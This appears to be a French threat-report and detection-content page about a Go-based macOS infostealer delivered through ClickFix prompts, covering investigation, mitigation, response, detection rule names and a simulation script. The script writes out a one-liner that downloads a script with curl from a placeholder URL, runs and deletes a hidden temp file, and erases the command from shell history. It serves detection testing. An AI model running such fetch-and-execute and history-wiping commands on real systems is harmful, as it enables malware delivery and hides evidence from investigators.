Un Infostealer macOS Cible les Portefeuilles de Cryptomonnaies
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Un voleur macOS basé sur Go cible les utilisateurs de cryptomonnaies par le biais d’une campagne d’ingénierie sociale ClickFix. Le malware vole des identifiants sensibles des trousseaux Apple et des magasins de navigateurs, tout en ayant la capacité de vider progressivement les soldes de cryptomonnaie des portefeuilles des victimes. La chaîne d’infection commence par un profil shell script qui livre des charges utiles Mach-O spécifiques à l’architecture.
Enquête
Les analystes de Huntress ont découvert la menace lors d’une chasse rétrospective et ont identifié des composants d’un voleur spécifique à macOS qui était resté actif pendant environ trois mois. L’enquête a lié l’infrastructure de soutien au groupe Aeza, un fournisseur d’hébergement à l’abri des sanctions russes. Les chercheurs ont reconstitué la chaîne d’attaque depuis l’invite d’ingénierie sociale ClickFix initiale jusqu’à l’exécution finale de la charge utile et la communication C2.
Atténuation
Les utilisateurs doivent éviter d’interagir avec des invites CAPTCHA suspectes ou de suivre des instructions inhabituelles nécessitant l’entrée de commandes dans le Terminal. Les extensions de navigateur conçues pour restreindre les scripts malveillants, telles que NoScript, et les outils de blocage basés sur DNS comme Pi-hole peuvent aider à réduire l’exposition. Une formation complète de sensibilisation des utilisateurs axée sur l’ingénierie sociale ClickFix reste l’une des défenses les plus efficaces.
Réponse
Si une infection est détectée, le système macOS affecté doit être isolé immédiatement pour arrêter l’exfiltration de données supplémentaire ou la déplétion du portefeuille de cryptomonnaie. Les administrateurs doivent localiser et supprimer tous les binaires Mach-O malveillants et les mécanismes de persistance associés. Étant donné que le malware cible les identifiants, les mots de passe de tous les comptes accessibles depuis l’appareil compromis doivent être réinitialisés.
Flux d’Attaque
Détections
Lancement de Bootstrap depuis un chemin non standard (via process_creation)
Proof of Value
Tentative possible d’énumération via System_profiler (via process_creation)
Proof of Value
Tentative d’exécution Curl suspecte [MacOS] (via cmdline)
Proof of Value
IOCs (HashSha256) pour détecter : logiciel malveillant macOS qui vide les portefeuilles veut votre crypto
Proof of Value
IOCs (SourceIP) pour détecter : logiciel malveillant macOS qui vide les portefeuilles veut votre crypto
Proof of Value
IOCs (DestinationIP) pour détecter : logiciel malveillant macOS qui vide les portefeuilles veut votre crypto
Proof of Value
Détection des techniques de persistance et d’exécution de logiciels malveillants macOS [Événement Fichier Linux]
Proof of Value
Attaque de logiciel malveillant macOS qui vide les portefeuilles [Création de processus Linux]
Proof of Value
Exécution de simulation
Condition préalable : Le contrôle préalable de télémetrie et de basale doit avoir réussi.
Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémetrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés conduiront à un mauvais diagnostic.
-
Narratif et commandes de l’attaque : L’adversaire initie une escroquerie ClickFix. La victime est trompée pour exécuter une commande dans son terminal. La commande utilise
curl -kFsSLpour télécharger silencieusement un script malveillant. Afin d’éviter de laisser des traces, le script s’exécute via un one-liner bash qui supprime immédiatement son propre fichier temporaire (.UlaccK). Enfin, l’attaquant exécute une commande complexehistorypour supprimer chirurgicalement la commande de l’historique du shell de l’utilisateur, rendant l’attaque invisible lors d’une inspection médicolégale occasionnelle. -
Script de test de régression :
#!/bin/bash # Simulation de l'attaque Malware ClickFix macOS # Ce script imite les chaînes de caractères exactes requises par la règle de détection. echo "[+] Démarrage de la simulation..." # 1. Simuler le téléchargement de curl (Sélection 3) # 2. Simuler l'exécution de bash et la suppression immédiate (Sélection 1) # 3. Simuler la manipulation de l'historique (Sélection 2) # Nous combinons ces éléments en une seule ligne pour imiter le modèle comportemental # Remarque : Nous utilisons une URL factice pour éviter l'exécution de logiciels malveillants réels curl -kFsSL https://raw.githubusercontent.com/dummy/malware/main/payload.sh > /dev/null 2>&1 && bash .UlaccK && rm -f .UlaccK && history -d $(history 1 2>/dev/null | awk '{print $1}') echo "[+] Commande de simulation exécutée." echo "[!] Vérifiez votre SIEM pour l'alerte 'Attaque Malware qui vide les portefeuilles MacOS'." -
Commandes de nettoyage :
# Supprimer tout artefact laissé par la simulation rm -f .UlaccK # Remarque : La manipulation de l'historique dans le script vise à simuler l'évasion ; # une restauration manuelle de l'historique peut être nécessaire pour l'utilisateur de test.